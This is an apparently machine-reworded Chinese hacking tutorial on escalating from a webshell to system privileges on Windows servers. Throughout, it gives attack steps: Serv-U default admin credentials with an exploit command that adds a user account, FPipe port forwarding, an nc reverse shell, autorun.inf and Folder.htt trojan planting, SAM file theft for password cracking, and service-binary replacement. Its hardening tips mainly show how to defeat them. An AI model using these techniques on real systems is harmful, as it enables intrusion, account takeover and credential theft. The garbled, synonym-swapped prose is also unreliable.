如今可以说网络工程师对网络服务器的设定是愈来愈BT,但BT的另外,也是有网络黑客小伙伴们对网络服务器的持续的检测,在检测中通常获得最少的guest权限是简易的,像我们在网站入侵全过程中,获得webshell是简易的,可是当由webshell的guest权限向system权限提高时却通常是停滞不前。因此 是我想写那样一篇文章的念头,可是在思索的全过程中,又迫不得已认可,方法是持续的探寻中出去的,方法也是有基本的也是有独辟蹊径的。下边就做一些简易的详细介绍,对提权的方法开展一些详细介绍,另外也期待在大量盆友的持续回应中可以丰富多彩大家的方法。
最先要表明的是,太早的一些系统漏洞大家就已不多讲过,只说一些现在可以看到的吧。也有便是文中的题型是webshell下的网络服务器提权方法。
下边大家就进到主题风格,对webshell的提权方法!
最先我们要确立的是,提权一般是借助服务器所启用的服务项目,利用服务项目存有的系统漏洞和管理人员设定的粗心大意开展提权的,但是都不清除一些SB的管理人员对端口设置的好像沒有"穿着打扮".下边便是对于一些普遍的服务项目开展的提权方法。
在获得webshell后,大家普遍的是看一下系统软件的服务项目,查询服务项目能够根据利用扫描枪对服务器ip开展扫描仪,或者在webshell中有实行dos指令时查询net start来查询服务器所对外开放的服务项目。最先大家说一下从简易的刚开始谈起:
1。pcanywhere的提权方法
pcanywhere手机软件我觉得大家都掌握,为何将它摆在首位便是由于载入登陆密码后立即联接就可以了,假如另一方服务器在启用了pcanywhere的服务器端得话,大家看可否自动跳转到这一目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,假如行那么就最好是了,直接下载它的CIF文档,随后应用pcanywhere的登陆密码读取器获得pcAnywhere登陆密码,随后应用pcanywhere登录就可以!接下去便是数据可视化实际操作了。
2。Serv-U提权方法
Serv-u能够说成互联网上较为火的一款FTP服务器软件,有很多像我这样的小白们全是看服务程序中是不是有Serv-u的过程中来开展提权的。Serv-u的提权方法对于不一样的版本号也是有不一样的方法,这儿大家就例举一二,很有可能并不是很全,但在别的网民的回应中可以持续的填补吧!
a.serv-U当地提权:serv-U当地提权一般是利用外溢程序流程对serv-u的设定上的缺点开展加上非常帐户的作用。比如Xiaolu写的serv-u.exe便是利用sevr-u的默认设置管理方法端口,管理员账号和登陆密码开展提权的,默认设置当地管理方法端口是:43958,默认设置管理人员:LocalAdministrator,默认设置登陆密码:#l@$ak#.lk;0@P,它是集成化在Serv-u內部的,能够以Guest权限来开展联接,对Serv-u开展管理方法,利用当地提权的重要便是找寻网络服务器文档目录中的everyone权限目录,下边我给大伙儿例举些普遍的everyone权限目录:
c:\winnt\system32\inetsrv\data\
是erveryone 良好控制,许多 情况下没作限定,把提高权限的专用工具上发上去,随后实行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\Documents\
许多 情况下data目录不好,试一下这一许多 服务器全是erveryone 良好控制!
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(假如网络服务器适用PHP)
c:\PHP(假如网络服务器适用PHP)
上边一些目录便是普遍的,但是都不清除一些独特的,像江民的kv2004对文件夹名称的权限设定就并不是很严苛的。
但是对于当地提权是能够预防的,下边是我还在xiaolu的文章内容中选节的:
避免 方法和防范措施:
一般避免 方法:设定目录权限,根据除掉Web目录iusr客户的实行权限来避免 应用Webshell来运作Exp程序流程。
防范措施:这类方法有一定的局限,必须设定的目录许多 ,不可以有一点疏忽,例如我也发觉许多 云虚拟主机在C:\Documents and Settings\All Users\ Documents目录及其下面好多个子目录Documents沒有设定权限,造成 能够在这个目录提交并运作Exp,这类目录也有x:\php,x:\perl等,由于这类目录全是everyone良好控制的。一些服务器还适用php,pl,aspx等,这真是便是网络服务器的Serv-U灾祸,^_^,运作程序流程更为便捷。
高級一点的避免 方法:改动Serv-u管理方法端口,用Ultraedit开启ServUDaemon.exe搜索B6AB(43958的16进制),换成自身界定的端口例如3930(12345),开启ServUAdmin.exe寻找最后一个B6AB换成3930(12345),起动Serv-u,如今当地管理方法端口就变成12345了:
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
防范措施:应对这类也非常简单,netstat –an,就能见到端口了,有些人说netstat没法运作,实际上你再提交个netstat.exe到可实行目录运作就ok了,随后改动一下Exp编译程序,提交运作就好了,我改动了一个能够自定端口的Exp,运作文件格式:
USAGE: serv-u.exe port "command"
Example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高級的避免 方法:改动管理人员名和登陆密码,用Ultraedit开启ServUDaemon.exe搜索Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,改动成等长短的其他标识符就可以了,ServUAdmin.exe也一样解决。
防范措施:这下默认设置的管理人员联接不上,也有方法么?哈哈哈,有的管理人员安裝Serv-u全是应用默认设置目录C:\Program Files\Serv-U安裝,这一目录尽管不可以写,也不可以改动,可是默认设置iusr是能够读的,大家可以用webshell来免费下载ServUDaemon.exe,用Ultraedit开启剖析一下,Serv-U的登录密码就拿到了,改动Exp编译程序提交运作,大家又获胜了。
最终防御力:
a.设定好目录权限,不必麻痹大意;
b.Serv-U最好是不必应用默认设置安装路径,设定Serv-U目录的权限,仅有管理人员才可以浏览;
c.我用详细介绍的方法改动Serv-U的默认设置管理人员姓名和登陆密码,喜欢的话端口还可以改正。
d.serv-U管理方法端口定项分享法:这儿必须应用的专用工具是FPipe.exe
我们要了解Serv-u默认设置当地管理方法端口是:43958,这个是只容许本地ip127.0.0.1开展登录和管理方法的,那麼大家就想是否可以使根据端口转为来远程访问呢?因此 大家采用FPipe.exe,最先是将FPipe.exe提交至网络服务器中,随后再cmd下实行
Fpipe.exe -v -l 12345-r 43958 127.0.0.1
这儿要表明的是,这一段标识符的意思是当浏览12345端口时便会全自动转为43958端口,也就是serv-u的管理方法端口
因此 我们在当地安裝一个Serv-u,
新创建一个网络服务器,填写另一方IP,
user:
LocalAdministrator
pass:
#l@$ak#.lk;0@P
联接之后你也就能够管理方法他的Serv-u了,剩余的实际操作便是实行上边提及的方法了!
===================================================
Serv-U的方法我也汇总出这好多个来,很有可能也有别的的方法也没有见到吧
但是本人觉得重要還是当地外溢系统漏洞的运用要较为多一些,因此 在网上也经常出現serv-u的该设备外溢程序流程
不一样版本号的也是五花八门,前一段时间对于serv-u6.0.2的改动了默认设置管理员账号和登陆密码的类似文章还请大伙儿参考校园内黑客联盟的鱼儿修练中的文章内容。
Serv-U的提权文章内容就临时先汇总到这儿,有更强的方法还请大伙儿回应!

3.Autorun方法:这类方法还可以说成较为历史悠久的方法,最开始应当是以光碟全屏播放中寻找到的设计灵感吧?不开展详说,得出文件格式就可以
制做一个Autoruan.inf文件.內容以下
[AutoRun]
open=bear.exe
bear.exe为恶意代码,与autorun.inf放到同一目录下!

4。SAM破译方法: 进到C:\WINNT\system32\config\ 免费下载他的SAM文档用lc等破解工具破译。

5。有关脚本制作提权方法:前边的serv-u的ftp提权中谈到的vbs这儿再聊下.进到c:\Documents and Settings\All Users\「刚开始」莱单\程序流程\起动 载入bat或vbs文件。这类方法也是归属于刻舟求剑类的,仅有在另一方服务器重起之后才能够做到目地。

6。NC的反跳提权:这儿就需要说NC的有关使用方法了,假如在另一方网络服务器中有充足的权限实行nc得话就好了,把它反跳到自身的电脑,你也就能够开展有关实际操作了!瑞士军刀实际方法很少说,得出文件格式,以下:
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234

7。conn等asp文件中泄露SQL账号登陆密码方法:这类方法说起来应当算作较为心存侥幸的方法。以前马俊和我讲过一次,原先沒有太在乎,如今还确实觉得一些功能强大了,寻找账户密码和数据库查询名在另一方沒有删掉xp_cmdshell标准下要sql联接专用工具联接就可以,联接之后就可以键入你要想的CMD命令了。

8。VNC的有关提权:VNC也是一个相近pcanywhere的远程访问手机软件,在linux运用普遍,以前在看中国台湾的一些网络服务器中有很多应用VNC的,方法也是我还在互联网初中到的,但是在运用中就取得成功过一次,较为烦闷!方法就转截一下吧,网站地址:http://www.hxhack.org/Article/HTML/14184.html
也有要填补的便是vnc是能够反方向联接的,这一方法也没有试过,仅仅以前看身影做了一个动画视频。

9。desktop.ini与Folder.htt方法。(此方法是在互联网见到的)方法以下:最先创建一个文件夹名称,进到,在空白点鼠标右键,挑选“自定文件夹名称”一直下点,默认设置就可以。进行后,你就会看到在这里目录下多了2个名叫Folder
setting的文件架与desktop.ini的文档,假如看不见,就把显示信息全部文档给选上,随后我们在Folder setting目录下寻找Folder.htt文档,文本文档开启,在随意地区添加下列编码:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马病毒名”></OBJECT> 随后你将你的木马病毒文档放到Folder setting目录下,把此目录与desktop.ini一起上传入另一方随意一个目录下,就可以了,要是等管理人员访问 了此目录,它就实行了大家的木马病毒,此方法也归属于相近autorun的刻舟求剑方法。

10。更换服务项目提权:我觉得非常复杂,但是一些情况下也好用,最先是看服务项目过程,在看大家是不是有运行命令的权限,这儿要采用的指令是rename,有关使用方法:
C:\>rename /?
重新命名文档。
RENAME [drive:][path]filename1 filename2.
REN [drive:][path]filename1 filename2.
比如更换c:\kv2004\kv.exe的过程
rename c:\kv2004\kv.exe bear.exe
随后再将大家的当地木马病毒文件命名为kv.exe上传入c:\kv2004\目录下,等候另一方重启动机算机就可以!